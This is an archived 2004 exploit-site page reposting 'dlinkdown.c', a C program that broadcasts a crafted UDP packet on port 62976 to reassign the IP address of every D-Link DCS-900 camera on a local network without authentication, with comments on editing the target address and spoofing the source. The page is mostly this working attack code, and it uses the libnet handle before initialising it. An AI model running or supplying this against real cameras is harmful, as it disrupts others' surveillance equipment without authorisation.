首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
D-Link DCS-900 camera Remote Exploit
来源:vfocus.net 作者:vfocus 发布时间:2004-09-01  

D-Link DCS-900 camera Remote IP address changer Exploit

/*
dlinkdown.c - miscname.com

change ip address on all dlink dcs-900 cameras on the local network without authentication

dlink dcs-900 ip cameras use a broadcast/listen method of configuration ...
rather than a static ip addr out of the box, it listens for a 62976/udp broadcast packet
telling it what ip addr to set itself too

http://www.dlink.com.au/Default.aspx?ArticleID=109

rtfs and mod the ip address to set all listening cameras too (default is 10.0.50.50)
*/

#include <libnet.h>
#include <stdio.h>
#include <stdlib.h>

int main (int argc, char *argv[]) {

libnet_t *p;
libnet_ptag_t ip, udp, ipoptions, ether;
u_long srcip, dstip;
u_short srcport = 62976, dstport = 62976, x;
signed int ret;
char errbuff[LIBNET_ERRBUF_SIZE], ipopt[21];
int len;
int8_t *macdst = "ff:ff:ff:ff:ff:ff";
u_int8_t *macdest;
char payload[128] = "\xfd\xfd\x00\x04\x00\x03\x00\x0f\x3d\x56\x97\x07"
"\x0a\x00\x32\x32" /* ip address to set too */
"\x00\x00\xff\xff\xff\x00\x00\x00\x00\x00";
u_short payloadlen = strlen(payload);

srcip = libnet_get_ipaddr4(p); /* mod to spoof */
dstip = libnet_name2addr4(p,"255.255.255.255",LIBNET_DONT_RESOLVE); /* 255.255.255.255 */
udp = ip = ether = ipoptions = 0;

if ( (macdest = libnet_hex_aton(macdst,&len)) == NULL) {
fprintf(stderr,"cant get mac str - %s",libnet_geterror(p));
exit (1);
}

if ( (p = libnet_init (LIBNET_LINK, NULL, errbuff)) == NULL) {
fprintf(stderr,"cant init() - %s\n",errbuff);
exit (1);
}

if ( (udp = libnet_build_udp(srcport,dstport,LIBNET_UDP_H + payloadlen,0,payload,payloadlen,p,udp)) == -1) {
fprintf(stderr,"cant build udp - %s\n",libnet_geterror(p));
exit (1);
}

for (x=0;x<20;x++) {
ipopt[x] = libnet_get_prand(LIBNET_PR2);
}

ipoptions = libnet_build_ipv4_options (ipopt,20,p,ipoptions);

if ( (ip = libnet_build_ipv4 (LIBNET_IPV4_H + 20 + payloadlen + LIBNET_UDP_H,0,250,0,128,IPPROTO_UDP,
0,srcip,dstip,payload,payloadlen,p,ip)) == -1) {
fprintf(stderr,"cant build ipv4 - %s\n",libnet_geterror(p));
exit (1);
}

if ((ether = libnet_build_ethernet (macdest,macdest,ETHERTYPE_IP,NULL,0,p,ether)) == -1) {
fprintf(stderr,"cant build ether - %s",libnet_geterror(p));
exit (1);
}

//libnet_diag_dump_pblock(p);

if ( (ret = libnet_write(p)) == -1) {
fprintf(stderr,"%s\n",libnet_geterror(p));
}

free(macdest); /* hex_aton malloc's - see libnet doco */
libnet_destroy(p);

return 0;
}
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·MusicDaemon<= 0.0.3 v2 Remo
·TiTan FTP Server Long Command
·Ground Control<= 1.0.0.7 se
·WFTPD Pro Server 3.21 MLST Rem
·Citadel/UX Remote Buffer Overf
·注射MSSQL时解决的一个未有人提
·NtRegmon Local Denial of Servi
·AOL Instant Messenger AIM "Awa
·Painkiller <= 1.31 code exe
·Courier-IMAP <= 3.0.2-r1 au
·Gaucho Email Client Buffer Ove
·TorrentTrader 1.0 RC2 SQL Inje
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved